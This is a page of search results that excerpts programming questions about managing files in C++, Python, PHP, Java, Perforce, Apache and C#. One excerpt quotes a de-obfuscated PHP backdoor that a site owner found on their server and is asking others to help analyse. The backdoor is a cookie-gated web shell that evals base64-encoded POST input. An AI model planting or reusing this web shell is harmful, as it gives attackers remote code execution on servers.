Search Results

Search found 46908 results on 1877 pages for 'managing files and folder'.


  • Elegant way of parsing Data files for Simulation

    - by sc_ray
    I am working on a project where I need to read in a lot of data from .dat files and use the data to perform simulations. The data in my .dat file looks as follows:

      DeviceID  InteractingDeviceID  InteractionStartTime  InteractionEndTime
      1         2                    1101                  1105

    The fields are tab delimited; the sample row means Device 1 interacted with Device 2 starting at 1101 ms and ending at 1105 ms. I have trace data sets that compile thousands of such interactions, and my job is to analyze them. The first step is to parse the file. The language of choice is C++. The approach I was thinking of taking is to read the file and, for every line read, create a Device object. This Device object will contain the property DeviceId and an array/vector of structs holding a list of all the devices the given DeviceId interacted with over the course of the simulation. The struct will contain the interacting device ID, the interaction start time and the interaction end time. I have a twofold question here: Is my approach correct? And if I am on the right track, how do I rapidly parse these tab-delimited data files and create Device objects without excessive memory overhead in C++? A push in the right direction will be much appreciated. Thanks
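
    A minimal sketch of the approach described above (the struct layout and the use of a map keyed by device ID are assumptions for illustration, not a definitive design):

      #include <fstream>
      #include <sstream>
      #include <string>
      #include <unordered_map>
      #include <vector>

      struct Interaction {
          int  otherDeviceId;
          long startTimeMs;
          long endTimeMs;
      };

      // Map each DeviceID to the interactions it participated in.
      std::unordered_map<int, std::vector<Interaction>> parseTrace(const std::string& path) {
          std::unordered_map<int, std::vector<Interaction>> devices;
          std::ifstream in(path);
          std::string line;
          std::getline(in, line);                  // skip the header row
          while (std::getline(in, line)) {
              std::istringstream fields(line);     // tabs count as whitespace for >>
              int id, other;
              long start, end;
              if (fields >> id >> other >> start >> end)
                  devices[id].push_back({other, start, end});
          }
          return devices;
      }

    Reading line by line this way keeps only one record in memory at a time besides the accumulated results, which is usually enough to avoid excessive overhead for traces of this size.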

    Read the article

  • Branch view for a file that has been split into multiple files

    - by ScottJ
    I have a large source file in Perforce that has been split up into several smaller files in a branch. I want to create a branch view that can handle this, but Perforce (2009.1) only sees the last of the multiple files. For example, I created:

      p4 integrate //depot/original/huge_file.c //depot/new/huge_file.c

    Later I split the huge file into smaller ones:

      p4 integrate //depot/new/huge_file.c //depot/new/small_file_one.c
      p4 integrate //depot/new/huge_file.c //depot/new/small_file_two.c
      p4 integrate //depot/new/huge_file.c //depot/new/small_file_three.c

    Then edit each of those (including //depot/new/huge_file.c) and submit. Now I make changes to //depot/original/huge_file.c and I want to integrate those changes to //depot/new. If I do this manually, it works fine:

      p4 integrate //depot/original/huge_file.c //depot/new/huge_file.c
      p4 integrate //depot/original/huge_file.c //depot/new/small_file_one.c
      p4 integrate //depot/original/huge_file.c //depot/new/small_file_two.c
      p4 integrate //depot/original/huge_file.c //depot/new/small_file_three.c

    But I don't want to do that every time I integrate -- this kind of thing belongs in a branch view. Unfortunately, if the branch view includes the same source file multiple times, the subsequent lines override the earlier ones. How can I create a branch view like this:

      //depot/original/huge_file.c //depot/new/huge_file.c
      //depot/original/huge_file.c //depot/new/small_file_one.c
      //depot/original/huge_file.c //depot/new/small_file_two.c
      //depot/original/huge_file.c //depot/new/small_file_three.c

    When I integrate using this branch spec, I get only small_file_three.c integrated.

    Read the article

  • Python: Most efficient way to concatenate and rearrange files

    - by user300890
    Hi, I am reading from several files; each file is divided into two pieces, first a header section of a few thousand lines followed by a body of a few thousand. My problem is I need to concatenate these files into one file where all the headers are at the top, followed by the bodies. Currently I am using two loops: one to pull out all the headers and write them, and a second to write the body of each file (I also include a tmp_count variable to limit the number of lines loaded into memory before dumping to file). This is pretty slow - about 6 min for a 13 GB file. Can anyone tell me how to optimize this, or if there is a faster way to do this in Python? Thanks! Here is my code:

      def cat_files_sam(final_file_name,work_directory_master,file_count):
          final_file = open(final_file_name,"w")
          if len(file_count) > 1:
              file_count=sort_output_files(file_count)
          # only for @ headers
          for bowtie_file in file_count:
              #print bowtie_file
              tmp_list = []
              tmp_count = 0
              for line in open(os.path.join(work_directory_master,bowtie_file)):
                  if line.startswith("@"):
                      if tmp_count == 1000000:
                          final_file.writelines(tmp_list)
                          tmp_list = []
                          tmp_count = 0
                      tmp_list.append(line)
                      tmp_count += 1
                  else:
                      final_file.writelines(tmp_list)
                      break
          for bowtie_file in file_count:
              #print bowtie_file
              tmp_list = []
              tmp_count = 0
              for line in open(os.path.join(work_directory_master,bowtie_file)):
                  if line.startswith("@"):
                      continue
                  if tmp_count == 1000000:
                      final_file.writelines(tmp_list)
                      tmp_list = []
                      tmp_count = 0
                  tmp_list.append(line)
                  tmp_count += 1
              final_file.writelines(tmp_list)
          final_file.close()

    Read the article

  • Sharing runtime variables between files

    - by nightcracker
    I have a project with a few files that all include the header global.hpp. Those files want to share and update information that is relevant for the whole program during runtime (that data is gathered progressively while the program runs, but the fields of data are known at compile time). Now my idea was to use a struct like this:

    global.hpp

      #include <string>

      #ifndef _GLOBAL_SESSION_STRUCT
      #define _GLOBAL_SESSION_STRUCT
      struct session_struct {
          std::string username;
          std::string password;
          std::string hostname;
          unsigned short port;
          // more data fields as needed
      };
      #endif

      extern struct session_struct session;

    main.cpp

      #include "global.hpp"

      struct session_struct session;

      int main(int argc, char* argv[]) {
          session.username = "user";
          session.password = "secret";
          session.hostname = "example.com";
          session.port = 80;
          // other stuff, etc
          return 0;
      }

    Now every file that includes global.hpp can just read & write the fields of the session struct and easily share information. Is this the correct way to do this? NOTE: For this specific project no threading is used. But please (for future projects and other people reading) clarify in your answer how this (or your proposed) solution works when threaded. Also, for this example/project session variables are shared, but this should also apply to any other form of shared variables.
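
    On the threading question: the extern-struct approach itself is fine single-threaded, but once multiple threads read and write the same fields you need synchronization. A minimal sketch of one common option (guarding the struct with a mutex; the names here are illustrative, not from the question):

      // global.hpp - threaded variant (sketch)
      #include <mutex>
      #include <string>

      struct session_struct {
          std::string username;
          std::string password;
          std::string hostname;
          unsigned short port;
      };

      extern session_struct session;
      extern std::mutex session_mutex;   // lock this before touching `session`

      // Exactly one .cpp file defines them:
      //   session_struct session;
      //   std::mutex session_mutex;

      // Usage in any file that includes global.hpp:
      //   {
      //       std::lock_guard<std::mutex> lock(session_mutex);
      //       session.username = "user";
      //   }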

    Read the article

  • Working with datetime type in Quickbooks My Time files

    - by jakemcgraw
    I'm attempting to process Quickbooks My Time imt files using PHP. The imt file is a plain-text XML file. I've been able to use the PHP SimpleXML library with no issues but one: the numeric representation of datetime in the My Time XML files is something I've never seen before:

      <object type="TIMEPERIOD" id="z128">
        <attribute name="notes" type="string"></attribute>
        <attribute name="start" type="date">308073428.00000000000000000000</attribute>
        <attribute name="running" type="bool">0</attribute>
        <attribute name="duration" type="double">3600</attribute>
        <attribute name="datesubmitted" type="date">310526237.59616601467132568359</attribute>
        <relationship name="activity" type="1/1" destination="ACTIVITY" idrefs="z130"></relationship>
      </object>

    You can see that attribute[@name='start'] has a value of 308073428.00000000000000000000. This is not Excel's method of storage - 308,073,428 is too many days since 1900-01-00 - and it isn't the Unix epoch either. So, my question is: has anyone ever seen this type of datetime representation?
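
    One plausible interpretation, offered as an assumption rather than anything confirmed in the question: My Time is a Mac application, and these values look like Cocoa/Core Data reference dates, i.e. seconds since 2001-01-01 00:00:00 UTC rather than days or Unix seconds. A quick sketch of that conversion in C++ (the 978307200-second offset between the Unix epoch and 2001-01-01 UTC is the key assumption):

      #include <ctime>
      #include <iostream>

      int main() {
          // Value taken from the <attribute name="start"> field above.
          double appleSeconds = 308073428.0;

          // Assumed offset: seconds between 1970-01-01 and 2001-01-01 (UTC).
          const std::time_t kAppleEpochOffset = 978307200;

          std::time_t unixTime = kAppleEpochOffset + static_cast<std::time_t>(appleSeconds);
          std::tm* utc = std::gmtime(&unixTime);

          char buf[32];
          std::strftime(buf, sizeof buf, "%Y-%m-%d %H:%M:%S UTC", utc);
          std::cout << buf << '\n';   // a date in October 2010, if the assumption holds
          return 0;
      }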

    Read the article

  • Apache is looking for htaccess and htpasswd files that aren't there

    - by user1094092
    Having an issue where Apache is requesting authentication, and looking for an .htpasswd file, based on instructions from an .htaccess file that's no longer in DocumentRoot. Background: in my DocumentRoot, I'd previously copied an .htaccess and .htpasswd file from another machine (along with all of the other website files). .htaccess contents:

      AuthType Basic
      AuthName "Password is required"
      AuthUserFile /some/directory/that/was/on/the/other/server/not/this/one/.htpasswd
      Require valid-user

    Here's the catch: I moved .htaccess and .htpasswd out of DocumentRoot and even renamed the files. There is no longer an .htaccess file in DocumentRoot at all. But when I try to access localhost from a browser, I am prompted to enter the login and password. When I enter the login and password (from the old, not-in-DocumentRoot .htpasswd file), I get a 500 Internal Server error and the log shows:

      [error] [client 127.0.0.1] (2)No such file or directory: Could not open password file: /some/directory/that/was/on/the/other/server/not/this/one/.htpasswd

    This has been quite a puzzle, because there's no longer a .htaccess or .htpasswd file anywhere in DocumentRoot! I have tried several Apache restarts and also tried using a blank .htaccess file in the DocumentRoot. I even grepped the entire machine for references to AuthType Basic to see if I missed anything. httpd.conf looks normal enough... I can post that if needed, but this question seems long enough as it is :) Thanks for any assistance you can provide.

    Read the article

  • List files with two dots in their names using java regular expressions

    - by Nivas
    I was trying to match files in a directory that had two dots in their name, something like theme.default.properties. I thought the pattern .\\..\\.. should be the required pattern [. matches any character and \. matches a dot], but it matches both oneTwo.txt and theme.default.properties. I tried the following (resources/themes has two files, oneTwo.txt and theme.default.properties):

      public static void loadThemes() {
          File themeDirectory = new File("resources/themes");
          if(themeDirectory.exists()) {
              File[] themeFiles = themeDirectory.listFiles();
              for(File themeFile : themeFiles) {
                  if(themeFile.getName().matches(".\\..\\.."));
                  {
                      System.out.println(themeFile.getName());
                  }
              }
          }
      }

    This prints nothing, and the following

      File[] themeFiles = themeDirectory.listFiles(new FilenameFilter() {
          public boolean accept(File dir, String name) {
              return name.matches(".\\..\\..");
          }
      });
      for (File file : themeFiles) {
          System.out.println(file.getName());
      }

    prints both oneTwo.txt and theme.default.properties. I am unable to find why these two give different results and which pattern I should be using to match two dots... Can someone help?
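
    Not from the question - just an illustration of the usual catch here: Java's String.matches() must match the entire file name, so a "two dots" pattern has to absorb the surrounding characters as well, e.g. ".*\\..*\\..*". The same anchored-match behaviour, sketched with C++ std::regex_match (which, like matches(), only succeeds on a whole-string match):

      #include <iostream>
      #include <regex>
      #include <string>

      int main() {
          // ".*\..*\..*" = anything, a literal dot, anything, another literal dot, anything.
          std::regex twoDots(R"(.*\..*\..*)");

          for (const std::string name : {"oneTwo.txt", "theme.default.properties"}) {
              std::cout << name << " -> "
                        << (std::regex_match(name, twoDots) ? "has two or more dots" : "does not")
                        << '\n';
          }
          return 0;
      }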

    Read the article

  • starting a windows executable via batch script, exe not in Program Files

    - by Anthony
    This is probably batch scripting 101, but I can't find any clear explanation/documentation on why this is happening or whether my workaround is actually the solution, so any terminology or links to good sources are really appreciated. I have a program I want to execute via batch script (along with several other programs). It's the only one where the exe is not in a Program Files folder. I can get it to start like this:

      C:\WeirdProgram\WeirdProgramModule\weirdmodule.exe

    But I get an error along the lines of:

      Run-time Error '3024': Could not find file C:\Users\MyUserName\Desktop\ModuleSettings.mdb

    So it seems that the program is looking for its settings files in the same location the batch script starts from. I finally got everything to work by doing the following:

      cd C:\WeirdProgram\WeirdProgramModule\
      weirdmodule.exe

    That works fine, and it's not the end of the world to have to go this route (just one extra line), but I've convinced myself that I'm doing something wrong based on a lack of basic understanding. Anybody know, or can point me to, why it works this way? Oh, and doing the following:

      start "C:\WeirdProgram\WeirdProgramModule\weirdmodule.exe"

    doesn't do anything at all. Thanks

    Read the article

  • sort files by date in PHP

    - by sasori
    Hi, I currently have an index.php file which outputs the list of files inside the same directory. The output shows the names, and I used the filemtime() function to show the date when each file was modified. My problem now is: how do I sort the output to show the most recently modified file first? I've been thinking for a while about how to do this; if I were doing it with MySQL there would be no problem at all. Please show me an example of how to sort and output the list of files starting from the latest modified one. This is what I have for now:

      if ($handle = opendir('.')) {
          while (false !== ($file = readdir($handle))) {
              if ($file != "." && $file != "..") {
                  $lastModified = date('F d Y, H:i:s',filemtime($file));
                  if(strlen($file)-strpos($file,".swf")== 4){
                      echo "<tr><td><input type=\"checkbox\" name=\"box[]\"></td><td><a href=\"$file\" target=\"_blank\">$file</a></td><td>$lastModified</td></tr>";
                  }
              }
          }
          closedir($handle);
      }
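
    The question asks for PHP, but the underlying pattern is language-independent: collect (name, mtime) pairs, sort by mtime descending, then print. Purely as an illustration of that pattern, here is a sketch in C++17 with std::filesystem (the directory path and output format are placeholders):

      #include <algorithm>
      #include <filesystem>
      #include <iostream>
      #include <vector>

      namespace fs = std::filesystem;

      int main() {
          // Collect (path, last-write-time) pairs for the files in the current directory.
          std::vector<std::pair<fs::path, fs::file_time_type>> files;
          for (const auto& entry : fs::directory_iterator(".")) {
              if (entry.is_regular_file())
                  files.emplace_back(entry.path(), entry.last_write_time());
          }

          // Newest first.
          std::sort(files.begin(), files.end(),
                    [](const auto& a, const auto& b) { return a.second > b.second; });

          for (const auto& f : files)
              std::cout << f.first.filename().string() << '\n';
          return 0;
      }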

    Read the article

  • PHP hack files found - help decoding and identifying

    - by akc
    I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like:

      if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){
          if (!empty($_POST['c'])) {
              echo '<textarea rows=28 cols=80>';
              $d=base64_decode(str_replace(' ','+',$_POST['c']));
              if($d) @eval($d);
              echo '</textarea>';
          }
          echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';
          exit;
      }

    But this chunk is usually embedded in a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704 I can sort of see where this code is going, but I'm definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden, would be super helpful and greatly appreciated. I tried to Google parts of the code to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla Thanks!

    Read the article

  • RewriteRule to store thousands of files in subdirectories

    - by Brandon
    I have a website that will have millions of pages in a directory. I'd like to store those files on disk in a bunch of subdirectories based on the first characters of the page name. For example, http://mysite.com/hugedir/somefile.html would be stored in /var/www/html/hugedir/s/o/m/e/f/ile.html. That is fairly trivial to do with a RewriteRule like so:

      RewriteRule ^hugedir/(.)(.)(.)(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}/{$4}/{$5}/$6.html
      RewriteRule ^hugedir/(.)(.)(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}/{$4}/{$5}.html
      RewriteRule ^hugedir/(.)(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}/{$4}.html
      RewriteRule ^hugedir/(.)(.)(.*).html /hugedir/{$1}/{$2}/{$3}.html
      RewriteRule ^hugedir/(.)(.*).html /hugedir/{$1}/{$2}.html
      RewriteRule ^hugedir/(.*).html /hugedir/{$1}.html

    However, the file name may contain hyphens or other non-standard characters, and I'd really like to avoid having a directory named with a strange character. Ideally, I'd like to have a list of 'approved' characters and either eliminate or transform the unapproved characters to an underscore. Can anybody think of a way to do that? Or something else equivalent? Part of the requirement is that these be physical files on disk and that requests not be parsed with a scripting language.

    Read the article

  • What files does JDIC need to run?

    - by Domchi
    I'm trying to call JDIC from my application, but I can't get it to run. What files do I need, and where? From what I've been able to gather from their site, I basically need to put jdic.jar in the classpath... however there is also a lib folder with a jdic.jar of a slightly different size, plus jdic_native_applet.jar, jdic_stub_unix.jar, jdic_stub_windows.jar and several folders with what I gather are platform-specific files. I get this exception when instantiating AssociationService:

      java.lang.ClassNotFoundException: org.jdesktop.jdic.filetypes.internal.AppAssociationReaderFactory_windows
          at java.net.URLClassLoader$1.run(URLClassLoader.java:200)
          at java.security.AccessController.doPrivileged(Native Method)
          at java.net.URLClassLoader.findClass(URLClassLoader.java:188)
          at java.lang.ClassLoader.loadClass(ClassLoader.java:307)
          at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:301)
          at java.lang.ClassLoader.loadClass(ClassLoader.java:252)
          at org.jdesktop.jdic.filetypes.AssociationService.<init>(Unknown Source)
          at QuickTest.main(QuickTest.java:101)

    I've tried the last "official" release and the last alpha release. I'm running Java 6 and Win7 64-bit. Does JDIC even work under Win7 (or 64-bit, although I use 32-bit Java)? I see no release after 2006, and no activity in the project after about 2008... while Win7 came out in 2009. I know that parts of JDIC, like Desktop, were included in Java 6, however that doesn't seem to be the case with file associations. And if it doesn't work, are there any (hopefully cross-platform) alternatives for managing file associations? There are some Windows-only things I tried, but they require running native commands with administrator privileges, which I don't know how to pull off apart from asking the user to run my app as administrator and then using Runtime.exec()... If there are no alternatives to JDIC, has anyone managed to handle file associations well with cross-platform installers?

    Read the article

  • C# comparing two files regex problem.

    - by Mike
    Hi everyone, what I'm trying to do is open a huge list of files (about 40k records) and match them against lines in a file that contains 2 million records; if my line from file A matches a line in file B, write out that line. File A contains a bunch of file names without extensions and file B contains full file paths including extensions. I'm using this but I can't get it to go...

      string alphaFilePath = (@"C:\Documents and Settings\g\Desktop\Arrp\Find\natst_ready.txt");
      List<string> alphaFileContent = new List<string>();
      using (FileStream fs = new FileStream(alphaFilePath, FileMode.Open))
      using (StreamReader rdr = new StreamReader(fs))
      {
          while (!rdr.EndOfStream)
          {
              alphaFileContent.Add(rdr.ReadLine());
          }
      }

      string betaFilePath = @"C:\Documents and Settings\g\Desktop\Arryup\Find\eble.txt";
      StringBuilder sb = new StringBuilder();
      using (FileStream fs = new FileStream(betaFilePath, FileMode.Open))
      using (StreamReader rdr = new StreamReader(fs))
      {
          while (!rdr.EndOfStream)
          {
              string betaFileLine = rdr.ReadLine();
              string matchup = Regex.Match(alphaFileContent, @"(\\)(\\)(\\)(\\)(\\)(\\)(\\)(\\)(.*)(\.)").Groups[9].Value;
              if (alphaFileContent.Equals(matchup))
              {
                  File.AppendAllText(@"C:\array_tech.txt", betaFileLine);
              }
          }
      }

    This doesn't work because alphaFileContent is a single line only, and I'm having a hard time figuring out how to get my regex to work on the file that contains all the file paths (betaFilePath). Here is a sample line from the beta file:

      C:\arres_i\Grn\Ora\SEC\DBZ_EX1\Nes\001\DZO-EX00001.txt

    And here is the line I'm trying to compare from my alpha file:

      DZO-EX00001
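
    Not from the question - just a sketch of the approach usually taken for this kind of join: load the smaller list of names into a hash set, then stream the big file once and test each path's stem for membership (no regex needed). Shown in C++17; the file names are placeholders:

      #include <filesystem>
      #include <fstream>
      #include <iostream>
      #include <string>
      #include <unordered_set>

      int main() {
          // Load the ~40k extension-less names into a set (placeholder file name).
          std::unordered_set<std::string> wanted;
          std::ifstream alpha("natst_ready.txt");
          for (std::string name; std::getline(alpha, name); )
              if (!name.empty()) wanted.insert(name);

          // Stream the ~2M full paths and keep those whose stem is in the set.
          std::ifstream beta("eble.txt");
          std::ofstream out("matches.txt");
          for (std::string pathLine; std::getline(beta, pathLine); ) {
              // stem() drops directory and extension: "...\DZO-EX00001.txt" -> "DZO-EX00001"
              // (backslashes are treated as separators when this runs on Windows)
              std::string stem = std::filesystem::path(pathLine).stem().string();
              if (wanted.count(stem))
                  out << pathLine << '\n';
          }
          return 0;
      }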

    Read the article

  • How to rename many files url escaped (%XX) to human readable form

    - by F. Hauri
    I have downloaded a lot of files into one directory, but many of them are stored with URL-escaped filenames, containing percent signs followed by two hexadecimal characters, like:

      ls -ltr $HOME/Downloads/
      -rw-r--r-- 2 user user 13171425 24 nov 10:07 Swisscom%20Mobile%20Unlimited%20Kurzanleitung-%282011-05-12%29.pdf
      -rw-r--r-- 2 user user  1525794 24 nov 10:08 31010ENY-HUAWEI%20E173u-1%20HSPA%20USB%20Stick%20Quick%20Start-%28V100R001_01%2CEnglish%2CIndia-Reliance%2CC%2Ccolor%29.pdf
      ...

    All these names match the following form with exactly 3 parts: the name of the object, then "-(" revision and/or date and other useless details ")", then the extension. My goal is to have one command that renames all these files to obtain:

      -rw-r--r-- 2 user user 13171425 24 nov 10:07 Swisscom_Mobile_Unlimited_Kurzanleitung.pdf
      -rw-r--r-- 2 user user  1525794 24 nov 10:08 31010ENY-HUAWEI_E173u-1_HSPA_USB_Stick_Quick_Start.pdf

    I've successfully done the job in pure bash with:

      urlunescape() {
          local srce="$1" done=false part1 newname ext
          while ! $done ;do
              part1="${srce%%%*}"
              newname="$part1\\x${srce:${#part1}+1:2}${srce:${#part1}+3}"
              [ "$part1" == "$srce" ] && done=true || srce="$newname"
          done
          newname="$(echo -e $srce)"
          ext=${newname##*.}
          newname="${newname%-(*}"
          echo ${newname// /_}.$ext
      }

      for file in *;do
          mv -i "$file" "$(urlunescape "$file")"
      done

    or using sed, tr, bash and sed again:

      for file in *;do
          echo -e $( echo $file | sed 's/%\(..\)/\\x\1/g' ) |
              sed 's/-(.*\.\([^\.]*\)$/.\1/' |
              tr \ \\n _\\0 |
              xargs -0 mv -i "$file"
      done

    Both produce the renamed files shown above. But I'm sure there must be a simpler and/or shorter way to do this.

    Read the article

  • Problems installing a package from PyPI: root files not installed

    - by intuited
    After installing the BitTorrent-bencode package, either via easy_install BitTorrent-bencode or pip install BitTorrent-bencode, or by downloading the tarball and installing that via easy_install $tarball, I discover that /usr/local/lib/python2.6/dist-packages/BitTorrent_bencode-5.0.8-py2.6.egg/ contains EGG-INFO/ and test/ directories. Although both of these subdirectories contain files, there are no files in the BitTorr* directory itself. The tarball does contain bencode.py, which is meant to be the actual source for this package, but it's not installed by either of those utils. I'm pretty new to all of this so I'm not sure if this is a problem with the package or with what I'm doing. The package was packaged a while ago (2007), so perhaps it's using some deprecated configuration aspect that I need to supply a command-line flag for. I'm more interested in learning what's wrong with either the package or my procedures than in getting this particular package installed; there is another package called hunnyb that seems to do a decent enough job of decoding bencoded data. Mostly I'd like to know how to deal with such problems in other packages.

    Read the article

  • transferring binary files between systems

    - by tim
    Hi guys, I'm trying to transfer my files between 2 UNIX clusters; the data is pure numeric (vectors of doubles) in binary form. Unfortunately one of the systems is an IBM ppc997 and the other is an AMD Opteron, and it seems the format of binary numbers on these systems is different. I have tried 3 ways so far:

    1. Changed my files to ASCII format (i.e. saved a number on each line in a text file), sent them to the destination and changed them back to binary on the target system (they both are UNIX, no end-of-line character difference??!)
    2. Sent the pure binaries to the destination
    3. Used uuencode, sent them to the destination and decoded them

    Unfortunately none of these methods works (my code on the destination system generates garbage, while it works on the first system; I'm 100% sure the code itself is portable). I don't know what else I can do - do you have any idea? I'm not a professional, please don't use computer scientists' terminology! And: my code is in C, so by binary I mean a one-to-one mapping between memory and hard disk. Thanks
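
    A hedged guess, not something stated in the question: PowerPC is big-endian and Opteron (x86-64) is little-endian, so raw doubles written on one machine are read with their bytes reversed on the other even though both use IEEE 754. A minimal sketch in C++ of byte-swapping such a file after transfer (the asker's code is C, but the idea is the same; the file name and swap direction are assumptions):

      #include <algorithm>
      #include <cstdio>
      #include <vector>

      // Reverse the byte order of one 8-byte double in place.
      static void swap8(unsigned char* p) {
          std::reverse(p, p + 8);
      }

      int main() {
          // Raw doubles as written on the big-endian machine (placeholder name).
          std::FILE* in = std::fopen("vectors.bin", "rb");
          if (!in) return 1;

          std::vector<double> values;
          double d;
          while (std::fread(&d, sizeof d, 1, in) == 1) {
              swap8(reinterpret_cast<unsigned char*>(&d));   // big-endian -> little-endian
              values.push_back(d);
          }
          std::fclose(in);

          std::printf("read %zu values\n", values.size());
          return 0;
      }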

    Read the article

  • mod_rewrite: no access to real files and directories

    - by tshabalala
    Hello. I use mod_rewrite/.htaccess for pretty URLs. I forward all the requests to my index.php, like this:

      RewriteRule ^/?([a-zA-Z0-9/-]+)/?$ /index.php [NC,L]

    The index.php then handles the requests. I'm also using this condition/rule to eliminate trailing slashes (or rather rewrite them to the URL without a trailing slash, with a 301 redirect; I'm doing this to avoid duplicate content and because I like no trailing slashes better):

      RewriteCond %{HTTP_HOST} !^\.localhost$ [NC]
      RewriteRule ^(.+)/$ http://%{HTTP_HOST}/$1 [R=301,L]

    This works well, except that I now get an infinite loop when trying to access a (real) directory (the rewrite rule removes the trailing slash, the server adds it again, ...). I solved this by setting the DirectorySlash directive to Off:

      DirectorySlash Off

    I don't know how good this solution is, I don't feel too confident about it tbh. Anyway, what I'd like to do is completely ignore "real" files and directories, since I don't need them and I only use pretty URLs with "virtual" files/directories anyway. This would allow me to avoid the DirectorySlash workaround/hack too. Is this possible? Thanks!

    Read the article

  • PHP transfer files from server to server in LAN

    - by cheapez
    So, I have 5-6 pages of requirements. I'm trying to build this application in PHP based on the requirements. I want to transfer files from one server to the other server in LAN, and then send a shell command to the other server to find out if the file has been transferred successfully. In php, I can transfer files using FTP, and send shell commands using SSH. Using the methods above, I will need to open connection to the server first, but I don't know the ftp server name, domain name, ip address, or anything like that. I only know the the server ID (I'm not sure what this ID is, but I guess it is like the computer's name). An example of the server ID is: "c23bap234" How do I open a connection with just that server ID? These servers are in the same building, have LAN connection, don't have connection to the outside world. These machines have PHP, Apache, ... installed. If my post doesn't make sense to you, it's because I'm a learner. I hope someone can help me on this. Thanks in advance.

    Read the article

  • Combine MD5 hashes of multiple files

    - by user685869
    I have 7 files that I'm generating MD5 hashes for. The hashes are used to ensure that a remote copy of the data store is identical to the local copy. Unfortunately, the link between these two copies of the data is mind-numbingly slow. Changes to the data are very rare but I have a requirement that the data be synchronized at all times (or as soon as possible). Rather than passing 7 different MD5 hashes across my (extremely slow) communications link, I'd like to generate the hash for each file and then combine these hashes into a single hash which I can then transfer and then re-calculate/use for comparison on the remote side. If the "combined hash" differs, then I'd start sending the 7 individual hashes to determine exactly which file(s) have been changed. For example, here are the MD5 hashes for the 7 files as of last week:

      0709d609d69385255c496436eb50402c
      709465a74411bd596595c7b9b158ae6a
      4ab657320ef33e3d5eb498e4c13d41b7
      3b49c6ab199994fd776bb63761414e72
      0fc28c5a010fc3c06c0c930c88e31a15
      c4ecd214662cac5aae0e53f6f252bf0e
      8b086431e43148a2c2d943ba30d31cc6

    I'd like to combine these hashes together such that I get a single unique value (perhaps another MD5 hash?) that I can then send to the remote system. On the remote system, I'd then perform the same calculation to determine if the data as a whole has been changed. If it has, then I'd start sending the individual hashes, etc. The most important factor is that my "combined hash" be short enough so that it uses less bandwidth than just sending all 7 hashes in the first place. I thought of writing the 7 MD5 hashes to a file and then hashing that file, but is there a better way?
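
    Not from the question - just a sketch of the usual trick: concatenate the per-file digests in a fixed, agreed-upon order and hash that concatenation; any digest of the 7 hex strings can serve as the "combined hash". Shown here with OpenSSL's MD5 function (the assumption being that libcrypto is available; any hash function would do):

      // Build with: g++ combine.cpp -lcrypto
      #include <openssl/md5.h>
      #include <cstdio>
      #include <string>
      #include <vector>

      int main() {
          // Per-file digests in a fixed order (first three sample values from above).
          std::vector<std::string> fileHashes = {
              "0709d609d69385255c496436eb50402c",
              "709465a74411bd596595c7b9b158ae6a",
              "4ab657320ef33e3d5eb498e4c13d41b7",
          };

          // Concatenate, then hash the concatenation.
          std::string all;
          for (const auto& h : fileHashes) all += h;

          unsigned char digest[MD5_DIGEST_LENGTH];
          MD5(reinterpret_cast<const unsigned char*>(all.data()), all.size(), digest);

          for (unsigned char b : digest) std::printf("%02x", b);
          std::printf("\n");   // the single 16-byte "combined hash" to send over the slow link
          return 0;
      }

    Because the order is fixed, both sides compute the same value, and a change in any one file changes the combined hash.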

    Read the article

  • Merging multiple docx files to one

    - by coding
    I am developing a desktop application in C#. I have coded a function to merge multiple docx files, but it does not work as expected: I don't get the content exactly as it was in the source files. A few blank lines are added in between, the content extends onto the next pages, header and footer information is lost, page margins get changed, etc. How can I concatenate the docs as they are, without any changes? Any suggestions will be helpful. This is my code:

      public bool CombineDocx(string[] filesToMerge, string destFilepath)
      {
          Application wordApp = null;
          Document wordDoc = null;
          object outputFile = destFilepath;
          object missing = Type.Missing;
          object pageBreak = WdBreakType.wdPageBreak;
          try
          {
              wordApp = new Application { DisplayAlerts = WdAlertLevel.wdAlertsNone, Visible = false };
              wordDoc = wordApp.Documents.Add(ref missing, ref missing, ref missing, ref missing);
              Selection selection = wordApp.Selection;
              foreach (string file in filesToMerge)
              {
                  selection.InsertFile(file, ref missing, ref missing, ref missing, ref missing);
                  selection.InsertBreak(ref pageBreak);
              }
              wordDoc.SaveAs(
                  ref outputFile, ref missing, ref missing, ref missing,
                  ref missing, ref missing, ref missing, ref missing,
                  ref missing, ref missing, ref missing, ref missing,
                  ref missing, ref missing, ref missing, ref missing);
              return true;
          }
          catch (Exception ex)
          {
              Msg.Log(ex);
              return false;
          }
          finally
          {
              if (wordDoc != null)
              {
                  wordDoc.Close();
              }
              if (wordApp != null)
              {
                  wordApp.DisplayAlerts = WdAlertLevel.wdAlertsAll;
                  wordApp.Quit();
                  Marshal.FinalReleaseComObject(wordApp);
              }
          }
      }

    Read the article

  • asset_packing tiny_mce files

    - by haries
    I use the inplacericheditor plugin and tiny_mce. Before asset_packager usage, this is how I included the files, and they worked well:

      <script src="/javascripts/patch_inplaceeditor_1-8-2.js" type="text/javascript"></script>
      <script src="/javascripts/patch_inplaceeditor_editonblank_1-8-2.js" type="text/javascript"></script>
      <script src="/javascripts/tiny_mce/tiny_mce.js" type="text/javascript"></script>
      <script src="/javascripts/tiny_mce_init.js" type="text/javascript"></script>
      <script src="/javascripts/inplacericheditor.js" type="text/javascript"></script>

    My asset_packager.yml section looks like this for the above files:

      tinyeditor:
        patch_inplaceeditor_1-8-2
        patch_inplaceeditor_editonblank_1-8-2
        tiny_mce/tiny_mce
        tiny_mce_init
        tiny_mce/langs/en
        tiny_mce/themes/advanced/editor_template
        tiny_mce/themes/advanced/langs/en
        tiny_mce/plugins/save/editor_plugin
        tiny_mce/plugins/autoresize/editor_plugin
        tiny_mce/plugins/paste/editor_plugin
        tiny_mce/plugins/preview/editor_plugin
        tiny_mce/plugins/table/editor_plugin
        tiny_mce/plugins/contextmenu/editor_plugin
        tiny_mce/plugins/emotions/editor_plugin
        inplacericheditor

